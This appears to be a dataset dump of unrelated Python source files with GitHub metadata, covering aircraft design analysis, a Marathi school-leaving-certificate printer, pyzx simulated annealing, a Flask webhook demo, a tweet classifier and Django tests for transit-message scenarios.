FUELDENSITY = design_input.loc["Fuel Density","Value"]
NTANK = design_input.loc["Total Number of Fuel Tanks","Value"]
#Set values based on engine data
WENG = engine_input["Weight"]
dummy, THRUST_N = engine_performance(
engine_input = engine_input,
number_of_engines = NENG,
altitude = 0.0,
mach = 0.0,
setting = 3
)
THRUST = THRUST_N/9.81
# Set values based on geometry data
for tag in geometry_data.keys():
#Component is fuselage
if geometry_data[tag]["Type"] == "Fuselage":
XL = geometry_data[tag]["Data"].loc["Length","Value"]
WF = geometry_data[tag]["Data"].loc["Max Width","Value"]
DF = geometry_data[tag]["Data"].loc["Max Depth","Value"]
SWTFU = geometry_data[tag]["Data"].loc["Wetted Surface Area","Value"]
FPAREA = WF*XL
TOTVOLFUSF = (geometry_data[tag]["Data"].loc["Theoretical Volume","Value"] - design_input.loc["Main Systems Volume","Value"] - 0.35*geometry_data[tag]["Data"].loc["Theoretical Volume","Value"])*(design_input.loc["Fuselage Fuel Volume Ratio","Value"]/100.0)
elif geometry_data[tag]["Type"] == "Wing":
TR = geometry_data[tag]["Data"].loc["Planform Taper Ratio","Value"]
SPAN = geometry_data[tag]["Data"].loc["Planform Span","Value"]
SW = geometry_data[tag]["Data"].loc["Planform Area","Value"]
ETR = geometry_data[tag]["Data"].loc["Exposed Planform Taper Ratio","Value"]
ESPAN = geometry_data[tag]["Data"].loc["Exposed Planform Span","Value"]
ESW = geometry_data[tag]["Data"].loc["Exposed Planform Area","Value"]
AR = (SPAN**2)/SW
TCA = geometry_data[tag]["Data"].loc["Weighted Average of Exposed Thickness to Chord Ratio","Value"]
LE_SWEEP = geometry_data[tag]["Data"].loc["Planform Leading-Edge Sweep Angle","Value"]
QC_SWEEP = np.arctan(np.tan(LE_SWEEP) - (4.0/AR)*((0.25)*((1.0-TR)/(1.0+TR))))
SWTWG = geometry_data[tag]["Data"].loc["Wetted Surface Area","Value"]
SFLAP += geometry_data[tag]["Data"].loc["Exposed Planform Area","Value"]*design_input.loc["Flap Area Factor","Value"]
elif geometry_data[tag]["Type"] == "Canard":
SCAN = geometry_data[tag]["Data"].loc["Exposed Planform Area","Value"]
TRCAN = geometry_data[tag]["Data"].loc["Exposed Planform Taper Ratio","Value"]
SWTCN = geometry_data[tag]["Data"].loc["Wetted Surface Area","Value"]
SFLAP += SCAN*design_input.loc["Flap Area Factor","Value"]
elif geometry_data[tag]["Type"] == "Horizontal Tail":
SHT = geometry_data[tag]["Data"].loc["Exposed Planform Area","Value"]
SWTHT = geometry_data[tag]["Data"].loc["Wetted Surface Area","Value"]
SFLAP += SHT*design_input.loc["Flap Area Factor","Value"]
elif geometry_data[tag]["Type"] == "Vertical Tail":
NVERT += 1
TRVT = geometry_data[tag]["Data"].loc["Exposed Planform Taper Ratio","Value"]
SVT = geometry_data[tag]["Data"].loc["Exposed Planform Area","Value"]
ARVT = geometry_data[tag]["Data"].loc["Exposed Planform Aspect Ratio","Value"]
LE_SWEEPVT = geometry_data[tag]["Data"].loc["Exposed Planform Leading-Edge Sweep Angle","Value"]
SWPVT = np.arctan(np.tan(LE_SWEEPVT) - (4.0/ARVT)*((0.25)*((1.0-TRVT)/(1.0+TRVT))))
SWTVT = geometry_data[tag]["Data"].loc["Wetted Surface Area","Value"]
SFLAP += SVT*design_input.loc["Flap Area Factor","Value"]
weight_data = analyze_weight(
TR,
SPAN,
SW,
TCA,
QC_SWEEP,
ULF,
PCTL,
SFLAP,
NEW,
XL,
FNEF,
SHT,
NVERT,
TRVT,
SVT,
ARVT,
SWPVT,
SCAN,
TRCAN,
WLDPAYLOAD,
NFIN,
SFIN,
TRFIN,
THRUST,
WF,
DF,
VMAX,
WPAINT,
SWTWG,
SWTHT,
SWTVT,
SWTFU,
SWTCN,
WENG,
NENG,
FPAREA,
WARM,
WMARG,
WPAYLOAD,
TOTVOLFUSF,
FUELDENSITY,
NTANK )
#Analyze Aerodynamics
aerodynamic_data = analyze_aerodynamics(
max_mach = design_input.loc["Maximum Mach Number","Value"],
max_altitude = design_input.loc["Maximum Altitude","Value"],
geometry_data = geometry_data,
cldesign = design_input.loc["Design Lift Coefficient","Value"],
base_area = design_input.loc["Base Area","Value"],
EWD = design_input.loc["Wave-Drag Efficiency Factor","Value"],
)
#Analyze Point Performance
point_performance_data = None
if isinstance(point_performance_input, pd.DataFrame):
point_performance_data = analyze_point_performance(
point_performance_input,
design_input,
engine_input,
geometry_data,
weight_data,
aerodynamic_data,
onlyobjectives=onlyobjectives)
return geometry_data, weight_data, aerodynamic_data, point_performance_data
| [
"50546864+e2Xg@users.noreply.github.com"
] | 50546864+e2Xg@users.noreply.github.com |
b80a77d8f486d5a17060304316da99d0e4bbddfe | 7d3e83bf2a100c347c11cb9d8193abb5f4c00360 | /build/exe.win32-3.6/mkmany.py | 62563a1bdec32a5dcc33669ce5ab066ff136a8d0 | [] | no_license | shinde-shantanu/LC_Maker | ad25cdc830711d48dd72a2a60a1c05e3bd1eb3d0 | 4105f853feeaa5b3951cfd521392277b430739ad | refs/heads/master | 2020-08-08T00:16:09.207357 | 2019-10-20T13:47:17 | 2019-10-20T13:47:17 | 213,636,674 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,495 | py | import pandas
#from lc1 import give_print
from pandas import *
df=read_csv('dbaa.csv')
from docx.enum.text import WD_ALIGN_PARAGRAPH
import docx
from docx import *
import tempfile
import win32api
import win32print
def print_all():
#merged_document = Document()
filename = 'lc - Copy.docx'
d1=docx.Document(filename)
d1.add_page_break()
for x in range(0,len(df['जनरल रजिस्टर क्र.'])):
print(df['आडनाव'][x])
#print(e.get())
dat={}
dat['अ. क्र. ']=str(int(df['अ. क्र. '][x]))
dat['जनरल रजिस्टर क्र.']=str(df['जनरल रजिस्टर क्र.'][x])
dat['स्टुडंट आय डी']=str(df['स्टुडंट आय डी'][x])
dat['यु आय डी नं.']=str(int(df['यु आय डी नं.'][x]))
print(str(int(df['यु आय डी नं.'][x])))
dat['आडनाव']=str(df['आडनाव'][x])
dat['नाव ']=str(df['नाव '][x])
dat['वडिलांचे नाव ']=str(df['वडिलांचे नाव '][x])
dat['आईचे नाव']=str(df['आईचे नाव'][x])
dat['राष्ट्रीयत्व']=str(df['राष्ट्रीयत्व'][x])
dat['मातृभाषा']=str(df['मातृभाषा'][x])
dat['धर्म']=str(df['धर्म'][x])
dat['जात']=str(df['जात'][x])
dat['पोटजात']=str(df['पोटजात'][x])
dat['जन्मस्थळ']=str(df['जन्मस्थळ'][x])
dat['तालुका']=str(df['तालुका'][x])
dat['जिल्हा']=str(df['जिल्हा'][x])
dat['राज्य']=str(df['राज्य'][x])
dat['देश']=str(df['देश'][x])
dat['इ.सनाप्रमाणे जन्मदिनांक']=str(df['इ.सनाप्रमाणे जन्मदिनांक'][x])
dat['जन्मदिनांक अक्षरी']=str(df['जन्मदिनांक अक्षरी'][x])
dat['या पूर्वीची शाळा व इयत्ता ']=str(df['या पूर्वीची शाळा व इयत्ता '][x])
dat['या शाळेत प्रवेश घेतल्याचा दिनांक ']=str(df['या शाळेत प्रवेश घेतल्याचा दिनांक '][x])
dat['इयत्ता ']=str(df['इयत्ता '][x])
dat['अभ्यासातली प्रगती']=str(df['अभ्यासातली प्रगती'][x])
dat['वर्तणूक ']=str(df['वर्तणूक '][x])
dat['शाळा सोडल्याचा दिनांक']=str(df['शाळा सोडल्याचा दिनांक'][x])
dat['कोणत्या इयत्तेत शिकत होता व केव्हापासून']=str(df['कोणत्या इयत्तेत शिकत होता व केव्हापासून'][x])
dat['शाळा सोडण्याचे कारण ']=str(df['शाळा सोडण्याचे कारण '][x])
dat['शेरा']=str(df['शेरा'][x])
#print(dat)
#f=open(filename,'x')
filename = 'lc - Copy.docx'
d=docx.Document(filename)
l=d.paragraphs
t=d.tables
gr=l[0]
gr.text="\nअनु. क्र " + dat['अ. क्र. ']
gr.add_run(str("जनरल रजि. क्र. " + dat['जनरल रजिस्टर क्र.']).rjust(126)) ##Gr. no. and count
s_id=l[3]
s_id.text = s_id.text +" "+ dat['स्टुडंट आय डी'] ##Student id
uid=l[4]
uid.text = uid.text + " " + dat['यु आय डी नं.'] ##uid no.
t[0].rows[0].cells[0].text=dat['नाव ']
t[0].rows[0].cells[1].text=dat['वडिलांचे नाव ']
t[0].rows[0].cells[2].text=dat['आडनाव']
m_name=l[7]
print(m_name.text+"abcd")
m_name.text = "आईचे नाव :" + " " + dat['आईचे नाव'] ##mothers name
nationality=l[8]
nationality.text="राष्ट्रीयत्व : "+dat['राष्ट्रीयत्व']+"\t"
nationality.add_run("मातृभाषा : " + dat['मातृभाषा']) ##nationality and mothertounge
rel=l[9]
rel.text="धर्म : "+dat['धर्म']+"\t"
rel.add_run("जात : "+dat['जात']+"\t")
rel.add_run("पोटजात : "+dat['पोटजात']+"\t") ##religion caste sub caste
birthplace=l[10]
birthplace.text="जन्मस्थळ (गांव/शहर) : "+dat['जन्मस्थळ']+"\t"
birthplace.add_run("तालुका : "+dat['तालुका']+"\t")
birthplace.add_run("जिल्हा : "+dat['जिल्हा']) ##birthplace village sub district district
state=l[11]
state.text="राज्य : "+dat['राज्य']+"\t"
state.add_run("देश : "+dat['देश']) ##state country
bday=l[12]
bday.text = bday.text + " " + dat['इ.सनाप्रमाणे जन्मदिनांक'] ##Birthdate
bdayw=l[13]
bdayw.text = bdayw.text + " " + dat['जन्मदिनांक अक्षरी'] ##Birthdate in words
prev_sch=l[14]
prev_sch.text = prev_sch.text + " " + dat['या पूर्वीची शाळा व इयत्ता '] ##Previous school and standard
do_join=l[15]
do_join.text="या शाळेत प्रवेश घेतल्याचा दिनांक : "+dat['या शाळेत प्रवेश घेतल्याचा दिनांक ']+"\t"
do_join.add_run("इयत्ता : "+dat['इयत्ता ']) ##Date of join and standard
prog=l[16]
prog.text="अभ्यासातील प्रगती : "+dat['अभ्यासातली प्रगती']+"\t"
prog.add_run("वर्तणूक : "+dat['वर्तणूक ']) ##Progress and remark
do_leave=l[17]
do_leave.text = do_leave.text + " " + dat['शाळा सोडल्याचा दिनांक'] ##date of leaving
standard=l[18]
standard.text = standard.text + " " + dat['कोणत्या इयत्तेत शिकत होता व केव्हापासून'] ##standard and since when
reason=l[19]
reason.text = reason.text + " " + dat['शाळा सोडण्याचे कारण '] ##reason for leaving
remark=l[20]
remark.text = remark.text + " " + dat['शेरा'] ##remark
for element in d.element.body:
d1.element.body.append(element)
d1.save("op.docx")
win32api.ShellExecute (
0,
"print",
"op.docx",
#
# If this is None, the default printer will
# be used anyway.
#
'/d:"%s"' % win32print.GetDefaultPrinter (),
".",
0
)
| [
"shantanushinde.shinde@gmail.com"
] | shantanushinde.shinde@gmail.com |
77628a507acbcfef9cf2afa34963e24495defd86 | 19662499684e7244185f81d69fd37713931d0e78 | /pyzx/local_search/simulated_annealing.py | cee62b3cb13e28cc672cae381755437686d8ab3b | [
"Apache-2.0"
] | permissive | rkruegs123/pyzx | 6e32578b280365f4bd4ec7a475dc1caead943725 | e1254d8cc98c2af6662411af14436aa5b4f2b658 | refs/heads/master | 2023-04-12T09:37:44.654974 | 2021-04-27T15:39:28 | 2021-04-27T15:39:28 | 361,756,628 | 0 | 0 | Apache-2.0 | 2021-04-26T13:16:47 | 2021-04-26T13:16:47 | null | UTF-8 | Python | false | false | 2,846 | py | # PyZX - Python library for quantum circuit rewriting
# and optimisation using the ZX-calculus
# Copyright (C) 2021 - Aleks Kissinger and John van de Wetering
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tqdm import tqdm # type: ignore
import random
import math
import numpy as np
from .congruences import uniform_weights, apply_rand_lc, apply_rand_pivot
from .scores import g_wgc
import sys
if __name__ == '__main__':
sys.path.append('..')
from pyzx.simplify import full_reduce
"""
This module contains an implementation of simulated annealing over ZX-diagrams. Equivalent ZX-diagrams are generated using the congruences defined in congruences.py. The default energy function is defined in scores.py. The default goal of this approach is to reduce the 2-qubit count of a fully-simplified ZX-diagram (i.e., of that circuit obtained via extraction).
"""
__all__ = ['anneal']
# simulated annealing
def anneal(g, iters=1000,
temp=25,
cool=0.005,
score=g_wgc,
cong_ps=[0.5, 0.5],
lc_select=uniform_weights,
pivot_select=uniform_weights,
full_reduce_prob=0.1,
reset_prob=0.0,
quiet=False
):
"""Simulated annealing over a ZX-diagram generated by the congruences defined in
congruences.py to minimize the supplied energy function"""
g_best = g.copy()
sz = score(g_best)
sz_best = sz
best_scores = list()
for i in tqdm(range(iters), desc="annealing...", disable=quiet):
g1 = g.copy()
cong_method = np.random.choice(["LC", "PIVOT"], 1, p=cong_ps)[0]
if cong_method == "PIVOT":
apply_rand_pivot(g1, weight_func=pivot_select)
else:
apply_rand_lc(g1, weight_func=lc_select)
# probabilistically full_reduce:
if random.uniform(0, 1) < full_reduce_prob:
full_reduce(g1)
sz1 = score(g1)
best_scores.append(sz_best)
if temp != 0: temp *= 1.0 - cool
if sz1 < sz or \
(temp != 0 and random.random() < math.exp((sz - sz1)/temp)):
sz = sz1
g = g1.copy()
if sz < sz_best:
g_best = g.copy()
sz_best = sz
elif random.uniform(0, 1) < reset_prob:
g = g_best.copy()
return g_best, best_scores
| [
"rkruegs123@gmail.com"
] | rkruegs123@gmail.com |
6d0343e54fbaea11fb067aa7b20d85419dff3c7a | 11063daf6a13da6c5ddc94ae542b2e466a1f869c | /test-demo/io-go-demo.py | 39f73e59cb8477fdafc7a89c42e7b992620cdec4 | [] | no_license | effielikesmilk/test-demo | 1caf9517479b51681d19d00cfeec07d8ff499a89 | 3ca9294555b3cfd9220b64755ac3e01eb39f9e7d | refs/heads/master | 2021-07-16T10:55:32.596585 | 2017-10-23T11:34:08 | 2017-10-23T11:34:08 | 107,973,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | # -*- coding:utf8 -*-
from __future__ import print_function # 禁用print,只能用print()
import os
import json
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = processRequest(req)
# print(res)
r = make_response(res) # make_response()的参数必须是字符串
r.headers['Content-Type'] = 'application/json'
return r
def processRequest(req):
my_action = req.get("result").get("action")
result = req.get("result")
parameters = result.get("parameters")
my_previous_action = parameters.get("my-action")
if my_action == "goSomewhere.no-recom-place":
my_action = my_previous_action
res = "那去铜锣湾你觉得ok吗?"
else:
res = "那你想去尖沙咀么?"
return res
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(port=port)
| [
"noreply@github.com"
] | effielikesmilk.noreply@github.com |
f4346c34f19288408128c36398eb661b7ac8aef3 | bf3157570dfb3e91001d8a30b7d89a06b6e5b5ff | /InitialConfiguration.py | 78a5a26ca586270e3a8323dfb4d187975bf248b9 | [] | no_license | shenoyvvarun/twit-miner | 0c9dcbee52ae5508a6a118b5bb82fed1181ec39b | fcf1331fe636678868a84270cc64cd06bc474dc0 | refs/heads/master | 2021-01-16T19:59:16.837543 | 2013-03-18T17:05:24 | 2013-03-18T17:05:24 | 9,126,082 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,331 | py | from TweetsClassifier import Classifier
from TweetsValidator import Validator
from TweetsProcessor import TweetProcessor
import json
#This code should be executed during the inital configuration / starting up
def main():
#has to be executed only once
addTrainingToTweets()
a =7.5
b =5.8
c =1.3
print "Please Be patient while we make things ready will take around 5 mins\nGrab a coffee till then"
classify = Classifier()
classify.categorisetweets()
for i in range(3):
cleanUpTrainingSet(a,b,c,"sports")
cleanUpTrainingSet(a,b,c,"politics")
classify = Classifier()
classify.categorisetweets()
validate = Validator()
validate.validateToFile(r'training.txt','Outputtraining.txt',a,b,c)
cleanUpTrainingSet(a,b,c,"sports")
cleanUpTrainingSet(a,b,c,"politics")
classify = Classifier()
classify.categorisetweets()
validate = Validator()
validate.validateToFile(r'validation.txt','Outputvalidation.txt',a,b,c)
cleanUpTrainingSet(a,b,c,"sports")
cleanUpTrainingSet(a,b,c,"politics")
classify = Classifier()
classify.categorisetweets()
validate = Validator()
validate.validateToFile(r'test.txt','OutputTest.txt',a,b,c)
print str((i+1)*100/3) +"% complete"
print "Awesome you are done.\nNow you can run RunTwitMiner.py as many time you want :) \nNote the input file for the program should be in test.txt and you will get the output in OutputTest.txt"
def cleanUpTrainingSet(a,b,c,cat):
#this code will cleanup training set with previous training to eliminate confusion.
#This code has to executed only once and is done in the above
tweetprocessor = TweetProcessor()
sportswords = json.load(open("sportswords"))
politicswords = json.load(open("politicswords"))
sportshashtags = json.load(open("sportshashtags"))
politicshashtags = json.load(open("politicshashtags"))
sportsmentions = json.load(open("sportsmentions"))
politicsmentions = json.load(open("politicsmentions"))
tweets = json.load(open(cat+"trainingset"))
for actualtweet in tweets:
tweet = tweetprocessor.processTweet(actualtweet)
words= tweetprocessor.getwords(tweet)
totalsportsweight = 0.0
totalpoliticsweight = 0.0
sportwordweight = 0.0
politicwordweight = 0.0
for word in words:
if(word != ''):
if(word[0] == '#' and len(word.split())<2):
sportwordweight = sportshashtags.get(word,0.0) +1.0
politicwordweight = politicshashtags.get(word,0.0) +1.0
if(sportwordweight!=0 or sportwordweight!=0):
totalsportsweight += a*(sportwordweight / (sportwordweight +politicwordweight))
totalpoliticsweight += a*(politicwordweight / (sportwordweight +politicwordweight))
elif(word[0] == '@' and len(word.split())<2):
sportwordweight = sportsmentions.get(word,0.0) +1.0
politicwordweight = politicsmentions.get(word,0.0) +1.0
if(sportwordweight!=0 or sportwordweight!=0):
totalsportsweight += b*(sportwordweight / (sportwordweight +politicwordweight))
totalpoliticsweight += b*(politicwordweight / (sportwordweight +politicwordweight))
else:
sportwordweight = sportswords.get(word,0.0) +1.0
politicwordweight = politicswords.get(word,0.0) +1.0
if(sportwordweight!=0 or sportwordweight!=0):
totalsportsweight += c*sportwordweight / (sportwordweight +politicwordweight)
totalpoliticsweight += c*politicwordweight / (sportwordweight +politicwordweight)
if (cat == "politics" and totalsportsweight > totalpoliticsweight):
tweets.remove(actualtweet)
if (cat == "sports" and totalsportsweight < totalpoliticsweight):
tweets.remove(actualtweet)
json.dump(tweets, open(cat + "trainingset", 'wb'),indent = True)
def addTrainingToTweets():
trainingset= open(r'training.txt', 'r').read().splitlines()
tweetprocessor = TweetProcessor()
sportstweets = []
politicstweets = []
for line in trainingset:
sportindex = line.find(" ")+9
if line.split()[1] == 'Sports':
sportstweets.append(tweetprocessor.processTweet(line[sportindex:-1]))
for line in trainingset:
politicsindex = line.find(" ")+11
if line.split()[1] == 'Politics':
politicstweets.append(tweetprocessor.processTweet(line[politicsindex:-1]))
json.dump(sportstweets, open("sportstrainingset", 'wb'),indent = True)
json.dump(politicstweets, open("politicstrainingset", 'wb'),indent = True)
if __name__ == "__main__":
main()
| [
"ahmed.bolwar@gmail.com"
] | ahmed.bolwar@gmail.com |
fc9b5929a490b9c6b323bc58c23b48778a7c5d42 | 153d52766a377fa12c3dab41f1ef4059d875d31d | /openebs/tests/test_model_scenario.py | 5676f8ab69ba1099e60aef2edd7fce7f2cb73931 | [] | no_license | StichtingOpenGeo/openebs2 | 8b09ec2d8b8a4f6eed5d8169f11506cdfbedde45 | f30110b08151de213d536f7223a6b46ac27f3d78 | refs/heads/master | 2023-05-23T22:07:06.397095 | 2023-05-11T10:30:26 | 2023-05-11T10:30:26 | 11,089,319 | 2 | 1 | null | 2023-05-11T10:30:27 | 2013-07-01T08:45:34 | Python | UTF-8 | Python | false | false | 8,146 | py | from datetime import timedelta
from django.contrib.auth.models import User
from django.contrib.gis.geos import Point
from django.test import TestCase
from django.utils.timezone import now
from kv1.models import Kv1Stop
from kv15.enum import *
from openebs.models import Kv15Scenario, Kv15ScenarioMessage, Kv15ScenarioStop, Kv15Stopmessage, Kv15ScenarioInstance
class Kv15ScenarioModel(TestCase):
haltes = []
user = None
def setUp(self):
# Haltes
h1 = Kv1Stop(pk=10, userstopcode='111', name="Om de hoek", location=Point(1, 1))
h2 = Kv1Stop(pk=11, userstopcode='112', name="Hier", location=Point(1, 1))
h3 = Kv1Stop(pk=12, userstopcode='113', name="Daar", location=Point(2, 2))
h4 = Kv1Stop(pk=14, userstopcode='114', name="Overal", location=Point(3, 3))
h5 = Kv1Stop(pk=15, userstopcode='115', name="Nergens", location=Point(4, 4))
h1.save()
h2.save()
h3.save()
h4.save()
h5.save()
self.haltes.append(h1)
self.haltes.append(h2)
self.haltes.append(h3)
self.haltes.append(h4)
self.haltes.append(h5)
# User
self.user = User.objects.filter(username="test_scenario")
if self.user.count() < 1:
self.user = User.objects.create_user("test_scenario")
else:
self.user = self.user[0]
def test_plan_scenario_multiple(self):
self.assertEqual(0, Kv15Stopmessage.objects.filter(dataownercode='HTM').count())
a = Kv15Scenario(name="Just a test")
a.save()
m1 = Kv15ScenarioMessage(scenario=a, dataownercode='HTM', messagecontent='Blah!')
m1.save()
Kv15ScenarioStop(message=m1, stop=self.haltes[0]).save()
Kv15ScenarioStop(message=m1, stop=self.haltes[1]).save()
m2 = Kv15ScenarioMessage(scenario=a, dataownercode='HTM', messagecontent='We rijden niet!')
m2.save()
Kv15ScenarioStop(message=m2, stop=self.haltes[2]).save()
m3 = Kv15ScenarioMessage(scenario=a, dataownercode='HTM', messagecontent='We rijden toch misschien wel hier niet!')
m3.save()
Kv15ScenarioStop(message=m3, stop=self.haltes[3]).save()
Kv15ScenarioStop(message=m3, stop=self.haltes[4]).save()
a.plan_messages(self.user, now(), now()+timedelta(hours=3))
msgs = Kv15Stopmessage.objects.filter(dataownercode='HTM')
self.assertEqual(3, msgs.count())
self.assertEqual(msgs[0].messagecodenumber, 5000)
self.assertEqual(msgs[0].dataownercode, 'HTM')
self.assertEqual(msgs[0].messagecodedate, now().date())
self.assertEqual(msgs[0].messagecontent, m1.messagecontent)
self.assertEqual(msgs[0].stops.all()[0].userstopcode, self.haltes[0].userstopcode)
self.assertEqual(msgs[0].stops.all()[1].userstopcode, self.haltes[1].userstopcode)
self.assertEqual(msgs[1].messagecodenumber, 5001)
self.assertEqual(msgs[1].dataownercode, 'HTM')
self.assertEqual(msgs[1].messagecodedate, now().date())
self.assertEqual(msgs[1].messagecontent, m2.messagecontent)
self.assertEqual(msgs[1].stops.all()[0].userstopcode, self.haltes[2].userstopcode)
self.assertEqual(msgs[2].messagecodenumber, 5002)
self.assertEqual(msgs[2].dataownercode, 'HTM')
self.assertEqual(msgs[2].messagecodedate, now().date())
self.assertEqual(msgs[2].messagecontent, m3.messagecontent)
self.assertEqual(msgs[2].stops.all()[0].userstopcode, self.haltes[3].userstopcode)
self.assertEqual(msgs[2].stops.all()[1].userstopcode, self.haltes[4].userstopcode)
self.assertEqual(3, Kv15ScenarioInstance.objects.count())
def test_plan_scenario_complete(self):
a = Kv15Scenario(name="Test complete scenario with all fields")
a.save()
m1 = Kv15ScenarioMessage(scenario=a, dataownercode='CXX', messagecontent='This trip will not operate')
m1.messagepriority = MESSAGEPRIORITY[0][0]
m1.messagetype = MESSAGETYPE[0][0]
m1.messagedurationtype = MESSAGEDURATIONTYPE[0][0]
m1.reasontype = REASONTYPE[0][0]
m1.subreasontype = SUBREASONTYPE[0][0]
m1.reasoncontent = "Oorzaak uitgelegd"
m1.effecttype = EFFECTTYPE[0][0]
m1.subeffecttype = SUBEFFECTTYPE[0][0]
m1.effectcontent = "Gevolg uitgelegd"
m1.measuretype = MEASURETYPE[0][0]
m1.submeasuretype = SUBMEASURETYPE[0][0]
m1.measurecontent = "Aanpassing uitgelegd"
m1.advicetype = ADVICETYPE[0][0]
m1.subadvicetype = SUBADVICETYPE[0][0]
m1.advicecontent = "Advies uitgelegd"
m1.save()
Kv15ScenarioStop(message=m1, stop=self.haltes[0]).save()
start = now()
a.plan_messages(self.user, start, start+timedelta(hours=5))
msgs = Kv15Stopmessage.objects.filter(dataownercode='CXX')
self.assertEqual(msgs[0].messagepriority, m1.messagepriority)
self.assertEqual(1, Kv15ScenarioInstance.objects.count())
def test_plan_scenario_delete(self):
a = Kv15Scenario(name="Test scenario and deletion")
a.save()
m1 = Kv15ScenarioMessage(scenario=a, dataownercode='WSF', messagecontent='Minder boten ivm storm!')
m1.save()
Kv15ScenarioStop(message=m1, stop=self.haltes[0]).save()
start = now()
a.plan_messages(self.user, start, start+timedelta(hours=5))
msgs = Kv15Stopmessage.objects.filter(dataownercode='WSF')
self.assertEqual(msgs[0].messagepriority, m1.messagepriority)
self.assertEqual(1, Kv15ScenarioInstance.objects.count())
a.delete_all()
self.assertEqual(0, Kv15Stopmessage.objects.filter(dataownercode='WSF', isdeleted=False).count())
self.assertEqual(0, Kv15ScenarioInstance.objects.filter(message__isdeleted=False).count())
# Check we can still force delete and the scenario instance object is cleaned up
msgs[0].force_delete()
self.assertEqual(0, Kv15Stopmessage.objects.filter(dataownercode='WSF').count())
self.assertEqual(0, Kv15ScenarioInstance.objects.count())
def test_plan_scenario_delete_active(self):
a = Kv15Scenario(name="Test scenario and deletion")
a.save()
m1 = Kv15ScenarioMessage(scenario=a, dataownercode='WSF', messagecontent='Minder boten ivm storm!')
m1.save()
Kv15ScenarioStop(message=m1, stop=self.haltes[0]).save()
start = now()
a.plan_messages(self.user, start-timedelta(hours=5), start-timedelta(hours=3))
msgs = Kv15Stopmessage.objects.filter(dataownercode='WSF')
self.assertEqual(msgs[0].messagepriority, m1.messagepriority)
self.assertEqual(1, Kv15ScenarioInstance.objects.count())
a.delete_all()
self.assertEqual(1, Kv15Stopmessage.objects.filter(dataownercode='WSF', isdeleted=False).count())
self.assertEqual(1, Kv15ScenarioInstance.objects.filter(message__isdeleted=False).count())
def test_delete_scenario(self):
# Ensure deleting a scenario doesn't delete messages
a = Kv15Scenario(name="Test scenario and deletion")
a.save()
m1 = Kv15ScenarioMessage(scenario=a, dataownercode='WSF', messagecontent='Minder boten ivm storm!')
m1.save()
Kv15ScenarioStop(message=m1, stop=self.haltes[0]).save()
start = now()
a.plan_messages(self.user, start-timedelta(hours=5), start-timedelta(hours=3))
msgs = Kv15Stopmessage.objects.filter(dataownercode='WSF')
self.assertEqual(msgs[0].messagepriority, m1.messagepriority)
self.assertEqual(1, Kv15Stopmessage.objects.filter(dataownercode='WSF', isdeleted=False).count())
a.delete()
self.assertEqual(0, Kv15ScenarioInstance.objects.count()) # Lose the association, but doesn't matter
self.assertEqual(1, Kv15Stopmessage.objects.filter(dataownercode='WSF', isdeleted=False).count())
self.assertEqual(0, Kv15Scenario.objects.count())
self.assertEqual(0, Kv15ScenarioMessage.objects.count())
self.assertEqual(0, Kv15ScenarioStop.objects.count()) | [
"joelhaasnoot@gmail.com"
] | joelhaasnoot@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.